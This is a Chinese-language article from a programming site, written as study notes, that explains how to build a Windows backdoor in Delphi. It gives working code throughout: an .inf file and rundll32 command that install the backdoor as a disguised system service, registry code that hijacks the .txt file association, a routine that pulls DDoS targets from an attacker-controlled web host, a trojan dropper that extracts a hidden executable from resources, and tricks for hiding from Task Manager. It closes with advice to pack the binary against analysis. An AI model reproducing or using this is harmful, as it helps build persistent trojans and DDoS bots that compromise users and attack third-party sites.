程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 更多編程語言 >> Delphi >> 關於開發系統後門軟件的幾點思路

關於開發系統後門軟件的幾點思路

編輯:Delphi

  關於開發系統後門軟件的幾點思路
  作者:Delphiscn(cnBlaster#sohu.com)
http://blog.csdn.Net/Delphiscn
  注釋:這只是一篇臨時的學習筆記

  目錄
  1、前言
  2、系統加載
  3、文件關聯
  4、攻擊控制
  5、文件隱匿
  6、附言

  前言
  現在的系統後門軟件數不勝數,但大都有一個通病,就是系統加載方面很容易被精明的老鳥們察覺。而且遇上類似“天網”或是“金山網镖”的網絡防火牆基本上就沒戲了。前些天在網上看到了一篇名叫《Do all in cmd shell》的文章,裡面關於程序加載的方式比較巧妙,對基於NT的2000XP這樣的系統基本上已經可以做到通用了。在此我用Delphi,並模仿一些經典後門軟件的功能寫一個Backdoor,希望與各位高手共同交流編程經驗,也算是復習一下以前學習的知識:)

  系統加載
  讀到這裡,估計很多朋友會立即聯想到HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun和Win.ini中的Load。沒錯,不過從實戰角度出發,現在再用這樣的啟動方式已經有點落後了。而且如果你的程序實現的功能很多,但如果在啟動方面出了問題,不是一件很郁悶的事嗎?在此,根據 《Do all in cmd shell》作者的思路,我們可以自己寫一個inf文件,利用這個文件配置一個系統服務程序。這樣,我們的後門就可以在不知不覺中,隨系統服務一起啟動了。(不過此方案有一個局限性:只適用於NT2000XP)這裡引用作者的原文:

  現在,讓我們用inf來添加一個系統服務
  [Version]
  Signature="$Windows NT$"
  [DefaultInstall.Services]
  AddService=inetsvr,,My_AddService_Name
  [My_AddService_Name]
  DisplayName=Windows Internet Service
  Description=提供對 Internet 信息服務管理的支持。
  ServiceType=0x10
  StartType=2
  ErrorControl=0
  ServiceBinary=%11%inetsvr.exe
  保存為inetsvr.inf,然後
  rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %systemroot%system32inetsvr.inf(在這裡我對原文做了點修改)
  [注:%systemroot%是個環境變量,假設你的系統文件夾是C:Windows,那麼%systemroot%的路徑就是C:Windows(一般為98或是XP)假設你的系統文件夾為C:winnt,那麼%systemroot%的路徑則為C:winnt(一般為2K)]
  這個例子增加一個名為inetsvr的服務(是不是很像系統自帶的服務,呵呵)。
  幾點說明:
  1,最後四項分別是
  服務類型:0x10為獨立進程服務,0x20為共享進程服務(比如svchost);
  啟動類型:0 系統引導時加載,1 OS初始化時加載,2 由SCM(服務控制管理器)自動啟
  動,3 手動啟動,4 禁用。
  (注意,0和1只能用於驅動程序)
  錯誤控制:0 忽略,1 繼續並警告,2 切換到LastKnownGood的設置,3 藍屏。
  服務程序位置:%11%表示system32目錄,%10%表示系統目錄(WINNT或Windows),%
  12%為驅動目錄system32drivers。其他取值參見DDK。你也可以不用變量,直接使用全路
  徑。
  這四項是必須要有的。
  2,除例子中的六個項目,還有LoadOrderGroup、DependencIEs等。不常用所以不介紹
  了。
  3,inetsvr後面有兩個逗號,因為中間省略了一個不常用的參數flags。
  刪除一個服務:
  [Version]
  Signature="$Windows NT$"
  [DefaultInstall.Services]
  DelService=inetsvr
  很簡單,不是嗎?

  下面的步驟就是要在Delphi中調用這個inf安裝服務。我們可以使用shellExecute這個函數,具體用法為
  shellExecute(handle,nil,pchar('rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %systemroot%system32inetsvr.inf'),nil,nil,sw_shownormal);
  我覺得這裡的sw_shownormal有點不是很好,因為在這個參數下。cmd shell的窗口是可見的,不知道你們有沒有什麼好的辦法?但是,我覺得shellExecute函數有一個好處-------如果應用程序找不到inf,在電腦屏幕上不會有任何的反映。簡單的說,就是不會報錯:)當然,如果你不放心那也可以使用GetWindowsDirectory函數對inf文件進行絕對定位,不過在這裡我覺得好象沒有這個必要。
  疑惑:在這裡我們的共享類型ServiceType=0x10屬於獨立進程服務。估計這個病毒要訪問Internet時會遭到防火牆的攔截。但是象類似svchost、lsass這樣的共享進程服務卻不會,如果我們把ServiceType的值改為0x20我想情況會有所改觀,不過在這裡我沒有深入研究。

  文件關聯
  按照慣例,我們可以對txt文本關聯進行修改,將注冊表中的鍵值指向我們的後門程序。下面這段代碼可以做到這一點:)
  var
    Backdoor: TRegistry;
    FileExt:String;
    FileType:String;
    FileDescription:String;
    ExecName:String;
    WinDir:String;
  begin
    FileExt:='.txt';
    FileType:='文本文檔';
    FileDescription:='文本文檔';

    SetLength(WinDir,128);//獲取Windows目錄
    GetWindowsDirectory(PChar(WinDir),128);
    SetLength(WinDir,StrLen(PChar(WinDir)));
    ExecName:=WinDir+'system32inetsvr.exe';//這裡的inetsvr.exe是我們的病毒程序

    Backdoor:=TRegistry.Create;//創建注冊表對象
    try
      Backdoor.RootKey:=HKEY_CLASSES_ROOT;//注冊表根鍵
      if not Backdoor.OpenKey(FileExt, True) then Exit; //當在注冊表中創建文件類型失敗時退出,一般是注冊表錯誤
      Backdoor.WriteString('',FileType);//寫文件類型數據
      Backdoor.CloseKey;

      if not Backdoor.OpenKey(FileType,True) then//打開文件類型FileType關鍵字
        Exit;
      Backdoor.WriteString('',FileDescription);//寫文件描述數據
      if not Backdoor.OpenKey('shellopencommand', True) then//打開子鍵
         Exit;
      Backdoor.WriteString('',ExecName);
      Backdoor.CloseKey;//關閉關鍵字
     finally
      Backdoor.Free;//釋放注冊表對象
     end;
  end;
  這樣,只要用戶雙擊txt文件,我們的inetsvr.exe就會又跟著啟動了。

  攻擊控制
  前些日子在網上看到了一篇關於用bat批處理文件控制病毒程序攻擊他人網站的一個例子。由於我對他的那個實例還沒有完全搞清楚,不過我們可以使用其他辦法來代替bat。下面我們來實現這個過程:
  首先,可以申請一個主頁空間(假設為
http://www.attack.com/Delphiscn
)。上傳一個ipaddress.txt的文檔。內容為192.168.0.1
  這裡的192.168.0.1為我們要攻擊的網站地址。
  在Delphi中添加如下語句:
  var ipaddress:integer;
  NMhttp.Get('http://www.attack.com/Delphiscn/ipaddress.txt');
  ipaddress:=strtoint(NMhttp.Body);
  NMhttp.Free;
  這樣,我們的程序就得到了要攻擊的網站地址IPaddress,而且這個IPAddress可由我們自己控制:)
  接下來就是論到攻擊了,我們可以在程序中加入一段代碼。向192.168.0.1不停的發送數據包。造成遠程服務器拒絕響應,也就是經常提到的DDOS。當然你也可以用類似Ping這樣的方法,由於比較簡單,這裡就不再細述了。

  文件隱匿
  如果你設計的程序功能比較強大,也許不止一個可執行文件,而且我們又不能象其他共享軟件那樣做安裝程序。其中最簡單的方法就是用copy/b setup.exe+run.exe set.exe這條命令把需要運行的程序加載在前一個可執行程序的後面,setup.exe文件的職責有兩個,其一是顯示假象讓別人不知道這是一個木馬安裝程序,其二就是真實的目的從指定字長定位將木馬服務程序截取下來並運行安裝,由於木馬服務部分采用了“隱形”技術,所以根本不會被察覺,代碼部分就是定位拷貝,這裡不在細述。還有一種方法是在資源文件RES中預先裝入木馬,並以數據形式存於當前可執行文件中,在合適的時機釋放即可。下面這段代碼可用於從RES中釋放指定的文件:
  procedure runvirus(from:pchar;Fileto:String);
  var
     tempdir:string;
     Buf:pointer;
     size:longint;
     h,ResHandle:Cardinal;
     zip:File;
  begin
  h:=GetModuleHandle(pchar(extractFilename(paramstr(0))));
     tempdir:='';
        reshandle:=FindResource(h,Makeintresource(1),'DAT');
    buf:=Pointer(loadresource(h,reshandle));
     size:=SizeofResource(h,reshandle);
  assignfile(zip,tempdir+fileto);
      rewrite(zip,1);
  try
      blockwrite(zip,buf^,size)
  finally
         closefile(zip);
    end;
  end;
  資源文件test.rc制作如下:
  * 內容:   1    DAT      "test.exe"
  * 制作:    BRCC32 test.rc
  * 在資源文件中加入:
     {$R *.DFM}
     //加入test.RES,如果不加這一行,當木馬釋放文件時會找不著資源而報錯,一定要注意這個問題:)
     {$R test.RES}
  * 函數調用:
     if not Fileexists('test.exe') then runvirus('DAT','test.exe');
  另外,附上幾個比較常用的小技巧:
  任務管理器中的隱形:
  我們可以使用清除標題的方法:
  program Project1;
  uses
    Forms,
    Unit1 in 'Unit1.pas' {Form1};
  {$R *.RES}
    begin
  //此處設置標題的清除
  Appilcation.Title:='';
  Application.Initialize;
  Application.CreateForm(TForm1,Form1);
  Application.Run;
  end.
  工具欄上的隱形:
  通過使用SetWindowLong函數即可:
  SetWindowLong(Application,Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);
  防止程序多次重復運行:
  在制作利用端口進行服務的同時,經常要防止程序的重復執行,因為同一份拷貝在運行時會使用相同的IP地址和相同的端口,必然會產生沖突。所以,為了防止程序二次執行。我們可以在程序啟動事件裡加入如下代碼:
  假設我們的程序標題為Neverland
  program Neverland;
  uses
  Forms,Windows,SysUtils,
  Neverland in 'Neverland.pas' {Form1};
  {$R *.RES}
  var
    hMutex:HWND;
    Ret:Integer;
  Begin
    Application.Initialize;
    Application.Title:='Neverland';
    hMutex:=CreateMutex(nil,False,'Neverland');
    Ret:=GetLastError;
    IF Ret<>ERROR_ALREADY_EXISTS Then
  Begin
     Application.CreateForm(TForm1, Form1);
  Application.Run;
    End
  Else
    ReleaseMutex(hMutex);
  end.

  附言
  通過上述改進,一個系統後門程序就已經初具雛形了。當然,如果您有興趣,還可以對其功能進行擴充。最後,千萬別忘了用ACPack對它加殼哦,這樣會增加他人反匯編的困難。如果您有什麼好的思路或方法,歡迎與大家一起討論:)    

  參考
  《Do all in cmd shell》
   
http://www.hackeronline.cn/showart.ASP?art_id=476&cat_id=7

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved